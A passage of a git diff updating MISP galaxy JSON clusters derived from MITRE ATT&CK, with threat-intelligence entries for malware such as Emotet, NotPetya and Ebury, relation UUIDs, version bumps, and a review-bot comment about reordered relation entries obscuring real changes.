"dc27c2ec-c5f9-4228-ba57-d67b590bda93", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "75ecdbf1-c2bb-4afc-a3f9-c8da4de8c661", + "value": "WannaCry - S0366" + }, + { + "description": "[Emotet](https://attack.mitre.org/software/S0367) is a modular malware variant which is primarily used 
as a downloader for other malware variants such as [TrickBot](https://attack.mitre.org/software/S0266) and IcedID. Emotet first emerged in June 2014 and has been primarily used to target the banking sector. (Citation: Trend Micro Banking Malware Jan 2019)", + "meta": { + "external_id": "S0367", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0367", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-banking-malware-uses-network-sniffing-for-data-theft/", + "https://securelist.com/the-banking-trojan-emotet-detailed-analysis/69560/", + "https://www.cisecurity.org/blog/emotet-changes-ttp-and-arrives-in-united-states/", + "https://support.malwarebytes.com/docs/DOC-2295", + "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor", + "https://www.us-cert.gov/ncas/alerts/TA18-201A", + "https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/", + "https://www.secureworks.com/blog/lazy-passwords-become-rocket-fuel-for-emotet-smb-spreader", + "https://blog.talosintelligence.com/2019/01/return-of-emotet.html", + "https://documents.trendmicro.com/assets/white_papers/ExploringEmotetsActivities_Final.pdf", + "https://www.cisecurity.org/white-papers/ms-isac-security-primer-emotet/", + "https://www.picussecurity.com/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc.html", + "https://redcanary.com/blog/stopping-emotet-before-it-moves-laterally/" + ], + "synonyms": [ + "Emotet", + "Geodo" + ] + }, + "related": [ + { + "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "32066e94-3112-48ca-b9eb-ba2b59d2f023", + "value": "Emotet - S0367" + }, + { + "description": "[HOPLIGHT](https://attack.mitre.org/software/S0376) is a backdoor Trojan that has reportedly been used by the North Korean government.(Citation: US-CERT HOPLIGHT Apr 2019)", + "meta": { + "external_id": "S0376", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0376", + "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A" + ], + "synonyms": [ + "HOPLIGHT" + ] + }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", + 
"tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "454fe82d-6fd2-4ac6-91ab-28a33fe01369", + "value": "HOPLIGHT - S0376" + }, + { + "description": "[NotPetya](https://attack.mitre.org/software/S0368) is malware that was first seen in a worldwide attack starting on June 27, 2017. 
The main purpose of the malware appeared to be to effectively destroy data and disk structures on compromised systems. Though [NotPetya](https://attack.mitre.org/software/S0368) presents itself as a form of ransomware, it appears likely that the attackers never intended to make the encrypted data recoverable. As such, [NotPetya](https://attack.mitre.org/software/S0368) may be more appropriately thought of as a form of wiper malware. [NotPetya](https://attack.mitre.org/software/S0368) contains worm-like features to spread itself across a computer network using the SMBv1 exploits EternalBlue and EternalRomance.(Citation: Talos Nyetya June 2017)(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)", + "meta": { + "external_id": "S0368", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0368", + "https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html", + "https://www.us-cert.gov/ncas/alerts/TA17-181A" + ], + "synonyms": [ + "NotPetya", + "GoldenEye", + "Petrwrap", + "Nyetya" + ] + }, + "related": [ + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "5719af9d-6b16-46f9-9b28-fb019541ddbb", + "value": "NotPetya - S0368" + }, + { + "description": "[CoinTicker](https://attack.mitre.org/software/S0369) is a malicious application that poses as a cryptocurrency price ticker and installs components of the open source backdoors EvilOSX and EggShell.(Citation: CoinTicker 2019)", + "meta": { + "external_id": "S0369", + "mitre_platforms": [ + "macOS" + ], + "refs": [ + "https://attack.mitre.org/software/S0369", + "https://blog.malwarebytes.com/threat-analysis/2018/10/mac-cryptocurrency-ticker-app-installs-backdoors/" + ], + "synonyms": [ + "CoinTicker" + ] + }, + "related": [ + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6fb6408c-0db3-41d9-a3a1-a32e5f16454e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "d1531eaa-9e17-473e-a680-3298469662c3", + "value": "CoinTicker - S0369" + }, + { + "description": "[Ebury](https://attack.mitre.org/software/S0377) is an SSH backdoor targeting Linux operating systems. 
Attackers require root-level access, which allows them to replace SSH binaries (ssh, sshd, ssh-add, etc) or modify a shared library used by OpenSSH (libkeyutils).(Citation: ESET Ebury Feb 2014)(Citation: BleepingComputer Ebury March 2017)", + "meta": { + "external_id": "S0377", + "mitre_platforms": [ + "Linux" + ], + "refs": [ + "https://attack.mitre.org/software/S0377", + "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/", + "https://www.bleepingcomputer.com/news/security/russian-hacker-pleads-guilty-for-role-in-infamous-linux-ebury-malware/" + ], + "synonyms": [ + "Ebury" + ] + }, + "related": [ + { + "dest-uuid": "56ff457d-5e39-492b-974c-dfd2b8603ffe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c1b11bf7-c68e-4fbf-a95b-28efbe7953bb", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": 
"54456690-84de-4538-9101-643e26437e09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "d6b3fcd0-1c86-4350-96f0-965ed02fcc51", + "value": "Ebury - S0377" } ], - "version": 12 + "version": 14 } diff --git a/clusters/mitre-mobile-attack-attack-pattern.json b/clusters/mitre-mobile-attack-attack-pattern.json index f634fb8..c0a9a6f 100644 --- a/clusters/mitre-mobile-attack-attack-pattern.json +++ b/clusters/mitre-mobile-attack-attack-pattern.json @@ -1670,5 +1670,5 @@ "value": "Malicious Software Development Tools - MOB-T1065" } ], - "version": 4 + "version": 5 } diff --git a/clusters/mitre-mobile-attack-course-of-action.json b/clusters/mitre-mobile-attack-course-of-action.json index 32e4b1d..81b31ae 100644 --- a/clusters/mitre-mobile-attack-course-of-action.json +++ b/clusters/mitre-mobile-attack-course-of-action.json @@ -304,5 +304,5 @@ "value": "Encrypt Network Traffic - MOB-M1009" } ], - "version": 5 + "version": 6 } diff --git a/clusters/mitre-mobile-attack-malware.json b/clusters/mitre-mobile-attack-malware.json index 1c59431..8697db8 100644 --- a/clusters/mitre-mobile-attack-malware.json +++ b/clusters/mitre-mobile-attack-malware.json @@ -609,6 +609,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "4bf6ba32-4165-42c1-b911-9c36165891c8", 
@@ -740,6 +747,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "41e3fd01-7b83-471f-835d-d2b1dc9a770c", @@ -1103,5 +1117,5 @@ "value": "XcodeGhost - MOB-S0013" } ], - "version": 7 + "version": 8 } diff --git a/clusters/mitre-pre-attack-attack-pattern.json b/clusters/mitre-pre-attack-attack-pattern.json index ac865ae..66fd09b 100644 --- a/clusters/mitre-pre-attack-attack-pattern.json +++ b/clusters/mitre-pre-attack-attack-pattern.json @@ -2785,5 +2785,5 @@ "value": "Data Hiding - PRE-T1097" } ], - "version": 5 + "version": 6 } diff --git a/clusters/mitre-pre-attack-intrusion-set.json b/clusters/mitre-pre-attack-intrusion-set.json index ca083fe..ba875c6 100644 --- a/clusters/mitre-pre-attack-intrusion-set.json +++ b/clusters/mitre-pre-attack-intrusion-set.json @@ -263,6 +263,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "6a2e693f-24e5-451a-9f88-b36a108e5662", @@ -296,6 +303,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8", @@ -355,5 +369,5 @@ "value": "APT17 - G0025" } ], - "version": 7 + "version": 8 } diff --git a/clusters/mitre-tool.json b/clusters/mitre-tool.json index 988757b..c64f5e9 100644 --- a/clusters/mitre-tool.json +++ b/clusters/mitre-tool.json 
@@ -111,7 +111,7 @@ "type": "uses" }, { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
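Review bot: This hunk, and the following mitre-tool.json hunks from `@@ -124,104 +124,6 @@` through `@@ -1151,7 +1152,28 @@`, mostly shuffle existing `dest-uuid` entries within the same `related` array (here `f879d51c-…` becomes `7385dfaf-…`, and the entries removed at `@@ -124,104 +124,6 @@` appear to come back under `@@ -342,7 +153,84 @@` and `@@ -356,7 +244,119 @@`), so the diff cannot show whether any `uses` relation was actually gained or lost for the affected clusters (the first of them ends at `"uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60"`, Mimikatz). Since these cluster files look machine-generated from the upstream ATT&CK data, the generator should emit `related` sorted by `dest-uuid` (and `refs`/`synonyms` in a stable order) so a re-import yields only real changes instead of this churn. Until that is in place, comparing the set of `dest-uuid` values per cluster before and after the commit is the only way to confirm this is a pure reorder plus the intended additions, which matters because a silently dropped relation degrades the technique mapping consumers rely on. The enclosing `related` array begins and ends outside this hunk.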
@@ -124,104 +124,6 @@ ], "type": "uses" }, - { - "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "544b0346-29ad-41e1-a808-501bb4193f47", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1c338d0f-a65e-4073-a5c1-c06878849f21", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": 
"uses" - }, - { - "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ @@ -229,62 +131,6 @@ ], "type": "uses" }, - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c3bce4f4-9795-46c6-976e-8676300bbc39", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "99709758-2b96-48f2-a68a-ad7fbd828091", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", "tags": [ 
@@ -292,13 +138,6 @@ ], "type": "uses" }, - { - "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", "tags": [ @@ -306,34 +145,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", "tags": [ 
@@ -342,7 +153,84 @@ "type": "uses" }, { - "dest-uuid": "772bc7a8-a157-42cc-8728-d648e25c7fe7", + "dest-uuid": "99709758-2b96-48f2-a68a-ad7fbd828091", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c3bce4f4-9795-46c6-976e-8676300bbc39", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": 